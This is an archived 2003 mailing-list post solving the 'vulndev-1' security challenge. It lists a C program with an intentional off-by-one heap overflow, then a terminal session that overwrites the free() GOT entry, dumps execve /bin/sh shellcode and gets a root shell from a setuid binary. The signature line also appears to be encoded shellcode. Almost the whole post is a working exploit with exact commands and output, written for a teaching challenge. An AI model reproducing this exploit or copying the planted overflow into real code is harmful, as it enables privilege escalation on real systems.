Re: vulndev1.c solution (warning SPOILER)

From: Jose Ronnick (matrixat_private)
Date: Tue May 13 2003 - 18:22:45 PDT

Next message: andrewgat_private: "Re: partial analysis of vulndev-1.c"

Previous message: Cameron Brown: "RE: Administrivia: List Announcement"
In reply to: Dave McKinney: "Administrivia: List Announcement"
Next in thread: Cameron Brown: "RE: vulndev1.c solution (warning SPOILER)"
Next in thread: Joel Eriksson: "Re: vulndev-1 exploit."
Reply: Cameron Brown: "RE: vulndev1.c solution (warning SPOILER)"
Reply: Jon Erickson: "Re: vulndev1.c solution (warning SPOILER)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Man.. someone's gotta show you guys how it's done...  If you want to solve it yourself, don't read any further..




matrix@overdose vuln-dev $ cat vulndev1.c
// vulndev-1.c
// vuln-dev mailing list security challenge #1
// by Aaron Adams <aadamsat_private>
// Spot the error in this program.

#include <stdio.h>
#include <stdlib.h>

#define SIZE    252

int
main(int argc, char *argv[])
{
                                int i;
        char    *p1, *p2;
        char    *buf1 = malloc(SIZE);
        char    *buf2 = malloc(SIZE);

        if (argc != 3)
                exit(1);

        p1 = argv[1], p2 = argv[2];
printf("p1 is at %p\n", p1);  // DEBUG                          
        strncpy(buf2, p2, SIZE);
        for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
                buf1[i] = p1[i];
        free(buf1);
        free(buf2);
        return 0;
}
matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c 
matrix@overdose vuln-dev $ sudo chown root.root ./vuln1
matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1
matrix@overdose vuln-dev $ objdump -R ./vuln1

./vuln1:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049654 R_386_GLOB_DAT    __gmon_start__
0804963c R_386_JUMP_SLOT   malloc
08049640 R_386_JUMP_SLOT   __libc_start_main
08049644 R_386_JUMP_SLOT   printf
08049648 R_386_JUMP_SLOT   exit
0804964c R_386_JUMP_SLOT   free
08049650 R_386_JUMP_SLOT   strncpy


matrix@overdose vuln-dev $ pcalc 0x4c-12
        64              0x40            0y1000000
matrix@overdose vuln-dev $ od -ch shell
0000000   1 300 260   F   1 333   1 311 315 200 353 026   [   1 300 210
        c031 46b0 db31 c931 80cd 16eb 315b 88c0
0000020   C  \a 211   [  \b 211   C  \f 260  \v 215   K  \b 215   S  \f
        0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53
0000040 315 200 350 345 377 377 377   /   b   i   n   /   s   h
        80cd e5e8 ffff 2fff 6962 2f6e 6873
0000056
matrix@overdose vuln-dev $ wc -c shell
     46 shell
matrix@overdose vuln-dev $ pcalc 252-46
        206             0xce            0y11001110
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"`
p1 is at 0xbffff839
Segmentation fault
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"`
p1 is at 0xbffff839
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b# 


questions?  comments?  >=)

-- 
%JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ-yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPPPPPPPPPPPPPPPPPPPPP

application/pgp-signature attachment: stored

Next message: andrewgat_private: "Re: partial analysis of vulndev-1.c"
Previous message: Cameron Brown: "RE: Administrivia: List Announcement"
In reply to: Dave McKinney: "Administrivia: List Announcement"
Next in thread: Cameron Brown: "RE: vulndev1.c solution (warning SPOILER)"
Next in thread: Joel Eriksson: "Re: vulndev-1 exploit."
Reply: Cameron Brown: "RE: vulndev1.c solution (warning SPOILER)"
Reply: Jon Erickson: "Re: vulndev1.c solution (warning SPOILER)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue May 13 2003 - 21:35:06 PDT